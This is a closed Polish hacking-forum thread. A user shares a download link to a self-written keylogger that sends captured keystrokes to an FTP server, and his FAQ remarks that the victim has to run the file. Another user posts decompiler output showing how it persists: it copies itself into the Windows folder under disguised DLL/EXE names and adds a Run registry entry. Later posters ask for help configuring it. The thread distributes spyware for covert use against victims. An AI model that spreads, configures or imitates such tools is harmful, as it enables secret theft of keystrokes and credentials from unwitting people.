[download] keylogger

Status
Zamknięty.

widmo17

Były Moderator
Dołączył
Lipiec 16, 2007
Posty
1089
Dzisiaj szperając po dysku znalazłem mojego keyloggera... pisanego z sześć miesięcy temu na zlecenie, ale zleceniodawca zrezygnował, a key pozostał ; x. Jak komuś się nudzi, czy coś, może sobie zobaczyć. Jest napisany w formie konfiguratora, zresztą wszystko pisze w `read_me.txt`. Logi są wysyłane na podany ftp.
Kod:
http://www.widmo.us/dodatki/winlog.rar
Nie spodziewajcie się nie wiadomo jakiego przeboju ani niesamowitej niewykrywalności, nie skanowałem go, bo mi się nie chciało xP

//F.A.Q.:
1. Blokuje firewall
2. Jest włączony antywirus
3. Zła konfiguracja
4. Ofiara musi uruchomić plik
5. Nie, nie pomogę Ci w konfiguracji
<
 

Gondoller

Użytkownik
Dołączył
Luty 21, 2008
Posty
259
Hmm... moze przeszlaby jakowas dekompilacja? ^^ W kazdym razie ogarnie sie ogolnie wyglad i funkcjonalnosc
<
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Nie mogłem sie powstrzymać, by nie zajrzeć do źródła.. Może to napisałeś już w pierwszym poście, ale ja też napisze.

Ledwo otworzyłem plik serwer.exe programem DeDe, patrze na procedure FormCreate, a tu jak byk:

Kod:
* Possible String Reference to: 'C:\WINDOWS\windll32lib.exe'
* Reference to: kernel32.CopyFileA()
* Reference to: Registry.TRegistry.Create(TRegistry;boolean);overload;
* Reference to: Registry.TRegistry.SetRootKey(TRegistry;HKEY);
* Possible String Reference to: 'Software\Microsoft\Windows\CurrentVersionRun'
* Possible String Reference to: 'C:/plik.exe'
* Possible String Reference to: 'wind32dll'
* Possible String Reference to: '‹ĺ]ĂC:\WINDOWS\windll32lib.exe'

To samo mówi za siebie. Tzn keylogger zapisuje sie do:

Kod:
C:\WINDOWS\windll32lib.exe

A o tym mówi ta linijka:

Kod:
* Reference to: kernel32.CopyFileA()

A oprócz tego jest niewiadoma:

Kod:
* Possible String Reference to: 'wind32dll'

Oraz linijka gdzie się keylogger do rejestru dodaje:

Kod:
* Possible String Reference to: 'Software\Microsoft\Windows\CurrentVersionRun'

Teraz patrze do OnDestroy:

Kod:
* Possible String Reference to: 'log-key.dll'
* Possible String Reference to: 'C:\win32library.dll'
* Possible String Reference to: 'schowek.dll'
* Possible String Reference to: 'C:\winclip32.dll'
* Possible String Reference to: 'C:\win32library.dll'
* Possible String Reference to: 'C:\winclip32.dll'

Heh.

Oprócz tego wrzuciłeś timer'a na formę, ale bardziej mnie martwi komponent KeySpy. Mogłeś oprzeć keylogger'a na globalnym hook'u ale to już twój wybór
smile.gif


PS. Nie wiedziałem że tak dużo syfu zostawiają komponenty INDY wciśnięte w program..
 

widmo17

Były Moderator
Dołączył
Lipiec 16, 2007
Posty
1089
536**** 20:46:25
pobrałem winlogger i kiedy go otwieram to mam podać host login i hasło ftp to co ja mam tam podac?[/b]
Hmm... chyba piszę nie wyraźnie czy coś
NIE POMAGAM PRZY KONGFIGURACJI!! MASZ GOOGLE TO ICH UŻYWAJ!!

@up: program pisany `dawno temu w trawie`, więc się nie starałem zbytnio, poza tym wiedza nie ta
<


//aha, jeszcze coś. Own3r, nie dziw się, u mnie w app w delphi kiedyś był taki burdel na trzech kółkach, że jak czytam stare źródła to aż się za głowę łapię ; x
 

KoshiMazaki

Użytkownik
Dołączył
Marzec 30, 2009
Posty
2
Hej widmo12 mam problemik jak konfiguruje winloggera i naciskam "utwórz serwer" to nic się nie dzieje wszystko wpisałem właściwie. ;/
 
Status
Zamknięty.
Do góry Bottom